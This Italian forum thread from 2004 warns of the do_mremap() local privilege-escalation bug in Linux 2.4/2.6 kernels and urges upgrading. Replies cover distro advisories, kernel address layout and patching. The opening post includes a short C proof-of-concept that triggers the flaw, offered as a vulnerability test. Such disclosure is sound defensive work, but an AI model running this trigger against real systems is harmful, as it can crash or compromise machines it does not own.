ATTENZIONE: Pericoloso bug nel kernel

mjordan · 13-01-2004, 06:12

E' stato da poco scoperto un bug che affligge tutte le versioni del kernel 2.4.x precedenti la 2.4.24 e il kernel 2.6.0 escluso il 2.6.1 nella gestione della VM e precisamente nella funzione do_mremap().

Il bug è pericoloso perchè opportunamente sfruttato può portare un utente ad avere il controllo completo della macchina in locale tramite l'esecuzione di istruzioni in kernel mode.
Per testare se il vostro sistema è afflitto usare il seguente codice:

Codice:

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
        void *base;

        base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

        real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                          (void *) 0xC0000000 );

        fork();

        return( 0 );
}

Per correggere il problema upgradare subito il kernel ad una versione 2.4.24 o 2.6.1.

Allusivo · 13-01-2004, 06:15

mjordan · 13-01-2004, 06:34

Quote:

Originariamente inviato da Allusivo

hilo · 13-01-2004, 09:54

mandrake: pacchetti da aggiornare

http://www.mandrakesecure.net/en/adv...MDKSA-2004:001

i pacchetti sono comunque in linea nella sezione updates - 9.2 (cito quella che uso io) dei vari mirror

VICIUS · 13-01-2004, 10:25

pensavo che con l'ultimo bug avessero capito che devono publicizarle di piu ste cose altrimenti passano inosservate e nessuno aggiorna il kernel.

ciao

hilo · 13-01-2004, 10:59

Quote:

Originariamente inviato da VICIUS
pensavo che con l'ultimo bug avessero capito che devono publicizarle di piu ste cose altrimenti passano inosservate e nessuno aggiorna il kernel.

ciao

comunque un utente mandrake, questa pagina la dovrebbe avere
nel suo bookmark
http://www.mandrakesecure.net/en/adv...es.php?dis=9.2

fatta molto bene, nello stile mandrake; anche perche' i bugfix updates i mandrakisti li conoscono molto bene

ciao

ilsensine · 13-01-2004, 13:09

Un pò

, è stato fissato da un paio di settimane.

Curiosità:

Quote:

Originariamente inviato da mjordan
Per testare se il vostro sistema è afflitto usare il seguente codice:

Non funziona sul mio kernel, che è tuttavia affetto dal bug

Qualche guru intuisce il perché?

(indizio: sto usando 1GB tondo tondo senza necessità di supporto highmem)

Allusivo · 13-01-2004, 18:03

Quote:

Originariamente inviato da ilsensine
Un pò

, è stato fissato da un paio di settimane.

Curiosità:

Non funziona sul mio kernel, che è tuttavia affetto dal bug

Qualche guru intuisce il perché?

(indizio: sto usando 1GB tondo tondo senza necessità di supporto highmem)

che forza, metterò il banchetto da 256mb anch'io allora così arrivo a 1gb tondo tonto!

maxithron · 13-01-2004, 19:31

Quote:

Originariamente inviato da ilsensine
.
Qualche guru intuisce il perché?

(indizio: sto usando 1GB tondo tondo senza necessità di supporto highmem)

Lungi da me la "gurusaggine"...ci provo lo stesso:

Forse perchè utilizzando 1GB tondo tondo sfrutti tutta mem fisica e non VM?

maxithron · 13-01-2004, 20:12

Per tutti quelli che hanno copiato ed incollato il codice postato da mjordan:

Beh.....sappiate che adesso lui ha il controllo delle vostre macchine. Ci siete cascati come i classici utonti winzozz!!!

LOL!!!!! STO SCHERZANDO!!!!!!

ilsensine · 13-01-2004, 20:51

Quote:

Originariamente inviato da maxithron
Lungi da me la "gurusaggine"...ci provo lo stesso:

Forse perchè utilizzando 1GB tondo tondo sfrutti tutta mem fisica e non VM?

Guarda, questa me la devi tradurre

No ho semplicemente riservato 1.5GB di indirizzi virtuali per il kernel, quindi la mia base è 0xa0000000 e non 0xc0000000 come l'esempio di mjordan si aspetta. Mi serviva questa modifica anche perché avevo bisogno, per altri motivi, di una buona quantità di indirizzi virtuali liberi per il kernel.

maxithron · 13-01-2004, 21:23

Quote:

Originariamente inviato da ilsensine
Guarda, questa me la devi tradurre

Non c'è bisogno....la tua faccina è già ,molto eloquente!!

Dovevo metterne una anch'io.

EDIT: cmq il senso (o ilsensine.....) di quello che volevo dire così, su quattro zampe, era questo:

Che avendo tu a disposizione una tale quantità di memoria reale, non avessi molto bisogno di riservare address per la memoria virtuale.

ilsensine · 14-01-2004, 08:55

Ho come l'impressione che confondi gli "indirizzi di memoria virtuale" con la memoria virtuale implementata ad es. tramite swap

mjordan · 14-01-2004, 14:18

Quote:

Originariamente inviato da ilsensine
Un pò

, è stato fissato da un paio di settimane.

Già ma visto che sto bug è pericoloso per gli utenti che non ne erano a conoscenza e che hanno utenti sulla propria macchina ho pensato di postarlo quì...

Repetita juvant!

NA01 · 14-01-2004, 14:26

sempre meglio saperlo 2 volte (io cmq non lo sapevo

)

domanda stupida!
che sito/mailing list usate per tenervi aggiornati sui buchi?

cia

Darky · 14-01-2004, 23:46

però che pizza l'upgrade del kernel in linux....ogni volta devi ricrearti e reinstallarti i moduli....e se hai driver o pacchetti compilati per il kernel precedente devi pure fare il rebuild di questi ed ottenere il nuov pacchetto per il nuovo kernel ( a propo', ques'ultima roba si può evitare o è meglio farla ? ).

Per fortuna io devo solo
ribuildare un driver, reinstallarlo e ricaricarne il modulo e riconfigurare il modem

Reinstallare e riconfigurare un secondo modulo/driver....

ma chissà chi ha da rifare molto di più ...boh....perdonatemi lo sfoghino dovuto all'ignoranza in materia...

linux_goblin · 15-01-2004, 12:37

ma non ci sono le patch che effettuano l'aggiornamento dei sorgenti?

così compili solo una volta senza effettuare alcun rebuild.

o sbaglio?

ciau,
Marco - Goblin

Darky · 15-01-2004, 12:44

si ma vedi nel mio caso si tratta di sorgenti di driver rilasciati da case produttrici di hardware.
E' già un miracolo che ci siano questi....ed infatti io li

figuriamoci se ora si mettono a fare le patch

maxithron · 15-01-2004, 16:30

Quote:

Originariamente inviato da ilsensine
Ho come l'impressione che confondi gli "indirizzi di memoria virtuale" con la memoria virtuale implementata ad es. tramite swap

Ci ho messo un pò a chiarirmi le idee. Ora va meglio!!

mjordan · 15-01-2004, 18:04

La patch 2.4.23 --> 2.4.24 sono solo 4Kb compressi bz2. Aggiorna dei file sorgenti che in nessun modo vanno ad intaccare il funzionamento di qualche modulo o driver. Se uno ha già un ramo di sorgenti ricompilato bastano 30 secondi per ricompilare quella decina di sorgenti e ricopiare la nuova immagine nella posizione dedicata al boot. Semplice e indolore.

Sarò pure una "pizza" ma la potenza è ovviamente un compromesso che va a scapito della comodità/facilità d'uso. Dipende dal prorpio concetto di sistema operativo IMHO.

13-01-2004, 06:12	#1
mjordan Bannato Iscritto dal: Mar 2002 Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3 Messaggi: 27578	ATTENZIONE: Pericoloso bug nel kernel E' stato da poco scoperto un bug che affligge tutte le versioni del kernel 2.4.x precedenti la 2.4.24 e il kernel 2.6.0 escluso il 2.6.1 nella gestione della VM e precisamente nella funzione do_mremap(). Il bug è pericoloso perchè opportunamente sfruttato può portare un utente ad avere il controllo completo della macchina in locale tramite l'esecuzione di istruzioni in kernel mode. Per testare se il vostro sistema è afflitto usare il seguente codice: Codice: #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define __NR_real_mremap __NR_mremap static inline _syscall5( void , real_mremap, void , old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void , new_address ); int main( void ) { void base; base = mmap( NULL, 8192, PROT_READ \| PROT_WRITE, MAP_PRIVATE \| MAP_ANONYMOUS, 0, 0 ); real_mremap( base, 0, 0, MREMAP_MAYMOVE \| MREMAP_FIXED, (void ) 0xC0000000 ); fork(); return( 0 ); } Per correggere il problema upgradare subito* il kernel ad una versione 2.4.24 o 2.6.1.

13-01-2004, 20:12	#10
maxithron Senior Member Iscritto dal: Mar 2002 Città: Italy/Usa Messaggi: 2817	Per tutti quelli che hanno copiato ed incollato il codice postato da mjordan: Beh.....sappiate che adesso lui ha il controllo delle vostre macchine. Ci siete cascati come i classici utonti winzozz!!! LOL!!!!! STO SCHERZANDO!!!!!! __________________ "Utilizzando atomi pentavalenti drogheremo il silicio di tipo n; Utilizzando atomi trivalenti drogheremo il silicio di tipo p; Utilizzando della cannabis ci drogheremo noi e vedremo il silicio fare cose impossibili" - DSDT-HowTo

14-01-2004, 08:55	#13
ilsensine Senior Member Iscritto dal: Apr 2000 Città: Roma Messaggi: 15625	Ho come l'impressione che confondi gli "indirizzi di memoria virtuale" con la memoria virtuale implementata ad es. tramite swap __________________ 0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12

14-01-2004, 23:46	#16
Darky Senior Member Iscritto dal: Oct 2001 Città: Milano - Bari Messaggi: 756	però che pizza l'upgrade del kernel in linux....ogni volta devi ricrearti e reinstallarti i moduli....e se hai driver o pacchetti compilati per il kernel precedente devi pure fare il rebuild di questi ed ottenere il nuov pacchetto per il nuovo kernel ( a propo', ques'ultima roba si può evitare o è meglio farla ? ). Per fortuna io devo solo ribuildare un driver, reinstallarlo e ricaricarne il modulo e riconfigurare il modem Reinstallare e riconfigurare un secondo modulo/driver.... ma chissà chi ha da rifare molto di più ...boh....perdonatemi lo sfoghino dovuto all'ignoranza in materia... __________________ Asus N56VZ-S4035V: CPU: i7-3610QM - RAM: 16 GB - GPU: 650m 2GB DDR3 - STORAGE: 256GB SSD (P830 Samsung) + 750 GB 7200 rpm - DISPLAY: Full HD 1920x1080 (LG-Philips) - OS: Windows 7 Home Premium

15-01-2004, 12:44	#18
Darky Senior Member Iscritto dal: Oct 2001 Città: Milano - Bari Messaggi: 756	si ma vedi nel mio caso si tratta di sorgenti di driver rilasciati da case produttrici di hardware. E' già un miracolo che ci siano questi....ed infatti io li figuriamoci se ora si mettono a fare le patch __________________ Asus N56VZ-S4035V: CPU: i7-3610QM - RAM: 16 GB - GPU: 650m 2GB DDR3 - STORAGE: 256GB SSD (P830 Samsung) + 750 GB 7200 rpm - DISPLAY: Full HD 1920x1080 (LG-Philips) - OS: Windows 7 Home Premium

13-01-2004, 06:15	#2
Allusivo Bannato Iscritto dal: Dec 2003 Città: Pordenone Messaggi: 609

13-01-2004, 09:54	#4
hilo Senior Member Iscritto dal: Jan 2002 Messaggi: 2370	mandrake: pacchetti da aggiornare http://www.mandrakesecure.net/en/adv...MDKSA-2004:001 i pacchetti sono comunque in linea nella sezione updates - 9.2 (cito quella che uso io) dei vari mirror

13-01-2004, 10:25	#5
VICIUS Senior Member Iscritto dal: Oct 2001 Messaggi: 11471	pensavo che con l'ultimo bug avessero capito che devono publicizarle di piu ste cose altrimenti passano inosservate e nessuno aggiorna il kernel. ciao

14-01-2004, 14:26	#15
NA01 Senior Member Iscritto dal: Jun 2003 Città: Genova Messaggi: 5676	sempre meglio saperlo 2 volte (io cmq non lo sapevo ) domanda stupida! che sito/mailing list usate per tenervi aggiornati sui buchi? cia

15-01-2004, 12:37	#17
linux_goblin Senior Member Iscritto dal: Oct 2000 Città: bergamo Messaggi: 713	ma non ci sono le patch che effettuano l'aggiornamento dei sorgenti? così compili solo una volta senza effettuare alcun rebuild. o sbaglio? ciau, Marco - Goblin

15-01-2004, 18:04	#20
mjordan Bannato Iscritto dal: Mar 2002 Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3 Messaggi: 27578	La patch 2.4.23 --> 2.4.24 sono solo 4Kb compressi bz2. Aggiorna dei file sorgenti che in nessun modo vanno ad intaccare il funzionamento di qualche modulo o driver. Se uno ha già un ramo di sorgenti ricompilato bastano 30 secondi per ricompilare quella decina di sorgenti e ricopiare la nuova immagine nella posizione dedicata al boot. Semplice e indolore. Sarò pure una "pizza" ma la potenza è ovviamente un compromesso che va a scapito della comodità/facilità d'uso. Dipende dal prorpio concetto di sistema operativo IMHO.

Strumenti
Mostra una versione stampabile Invia questa pagina per email